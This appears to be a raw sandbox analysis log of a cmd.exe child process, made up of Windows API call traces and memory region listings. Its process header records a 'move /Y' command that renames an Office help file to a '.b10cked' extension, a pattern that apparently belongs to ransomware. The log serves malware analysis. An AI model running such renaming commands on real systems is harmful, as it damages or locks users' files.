lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0203.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0203.086] _wcsicmp (_String1="move", _String2=")") returned 68 [0203.086] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0203.086] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0203.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0203.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0203.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0203.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0203.088] GetConsoleTitleW (in: lpConsoleTitle=0x22f928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.089] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="CD") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="REN") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="SET") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="MD") returned 11 [0203.089] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0203.089] _wcsicmp (_String1="move", _String2="RD") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0203.089] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0203.089] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0203.089] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0203.089] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="VER") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0203.089] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0203.089] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0203.089] _wcsicmp (_String1="move", _String2="START") returned -6 [0203.089] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0203.089] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0203.089] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0203.091] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.091] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.091] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f6e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f6dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f6dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0203.091] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0203.092] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0203.092] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0203.092] _wcsicmp (_String1="MSINFO~2.HXN", _String2=".") returned 63 [0203.092] _wcsicmp (_String1="MSINFO~2.HXN", _String2="..") returned 63 [0203.092] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~2.hxn")) returned 0x2022 [0203.093] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 [0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", nBufferLength=0x104, lpBuffer=0x22f06c, lpFilePart=0x22f054 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", lpFilePart=0x22f054*="MSINFO~2.HXN") returned 0x27 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0203.093] _wcsicmp (_String1="MSINFO~2.HXN", _String2=".") returned 63 [0203.093] _wcsicmp (_String1="MSINFO~2.HXN", _String2="..") returned 63 [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msinfo~2.hxn")) returned 0x2022 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 [0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", nBufferLength=0x104, lpBuffer=0x22f4e8, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", lpFilePart=0x22f280*="MSINFO~2.HXN") returned 0x27 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] SetErrorMode (uMode=0x0) returned 0x0 [0203.093] SetErrorMode (uMode=0x1) returned 0x0 [0203.093] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x22f6f0, lpFilePart=0x22f280 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked", lpFilePart=0x22f280*="MS.INFOPATHEDITOR.14.1033.hxn.b10cked") returned 0x40 [0203.093] SetErrorMode (uMode=0x0) returned 0x1 [0203.093] SetLastError (dwErrCode=0x0) [0203.093] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.infopatheditor.14.1033.hxn.b10cked")) returned 0xffffffff [0203.093] GetLastError () returned 0x2 [0203.094] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22ebfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ebfc) returned 0x310eb0 [0203.094] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x22ebfc | out: lpFindFileData=0x22ebfc) returned 0 [0203.094] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.094] GetLastError () returned 0x12 [0203.094] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22ebfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ebfc) returned 0x310eb0 [0203.094] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x22ebfc | out: lpFindFileData=0x22ebfc) returned 0 [0203.094] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.095] GetLastError () returned 0x12 [0203.095] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0203.095] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x321c08 | out: lpFindFileData=0x321c08) returned 0 [0203.095] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.095] GetLastError () returned 0x12 [0203.095] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c08) returned 0x310eb0 [0203.096] FindNextFileW (in: hFindFile=0x310eb0, lpFindFileData=0x321c08 | out: lpFindFileData=0x321c08) returned 0 [0203.096] FindClose (in: hFindFile=0x310eb0 | out: hFindFile=0x310eb0) returned 1 [0203.096] GetLastError () returned 0x12 [0203.096] _get_osfhandle (_FileHandle=2) returned 0xb [0203.096] GetFileType (hFile=0xb) returned 0x2 [0203.211] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0203.211] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22edcc | out: lpMode=0x22edcc) returned 1 [0203.211] _get_osfhandle (_FileHandle=2) returned 0xb [0203.211] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ee00 | out: lpConsoleScreenBufferInfo=0x22ee00) returned 1 [0203.211] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.212] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ee40 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.212] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x22ee24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ee24*=0x2c) returned 1 [0203.212] longjmp () [0203.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.212] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.213] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.213] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.213] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.213] SetConsoleInputExeNameW () returned 0x1 [0203.213] GetConsoleOutputCP () returned 0x1b5 [0203.213] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.213] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.213] exit (_Code=1) Process: id = "464" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29226 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29227 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29228 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29229 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 29230 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29231 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29232 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29233 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29234 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29235 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29578 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29579 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29580 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 29581 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29582 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 29583 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29584 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29585 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29586 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29587 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29588 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29589 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29590 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29591 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29636 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 29637 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29638 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29639 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 29640 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 29641 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29642 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29643 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 29644 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 29645 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 29685 start_va = 0x12c0000 end_va = 0x137ffff entry_point = 0x12c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 660 os_tid = 0xcd8 [0201.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f994 | out: lpSystemTimeAsFileTime=0x14f994*(dwLowDateTime=0xad077200, dwHighDateTime=0x1d440a9)) [0201.689] GetCurrentProcessId () returned 0xcfc [0201.689] GetCurrentThreadId () returned 0xcd8 [0201.689] GetTickCount () returned 0x38f34 [0201.689] QueryPerformanceCounter (in: lpPerformanceCount=0x14f98c | out: lpPerformanceCount=0x14f98c*=25847795626) returned 1 [0201.690] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.690] __set_app_type (_Type=0x1) [0201.690] __p__fmode () returned 0x76b331f4 [0201.690] __p__commode () returned 0x76b331fc [0201.690] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.690] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.690] GetCurrentThreadId () returned 0xcd8 [0201.690] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd8) returned 0x38 [0201.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.690] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.690] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f924 | out: phkResult=0x14f924*=0x0) returned 0x2 [0201.714] VirtualQuery (in: lpAddress=0x14f95b, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.715] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.743] GetEnvironmentStringsW () returned 0x1a0188* [0201.743] FreeEnvironmentStringsW (penv=0x1a0188) returned 1 [0201.743] GetEnvironmentStringsW () returned 0x1a0188* [0201.743] FreeEnvironmentStringsW (penv=0x1a0188) returned 1 [0201.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e894 | out: phkResult=0x14e894*=0x40) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0xb0, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x0, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegCloseKey (hKey=0x40) returned 0x0 [0201.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 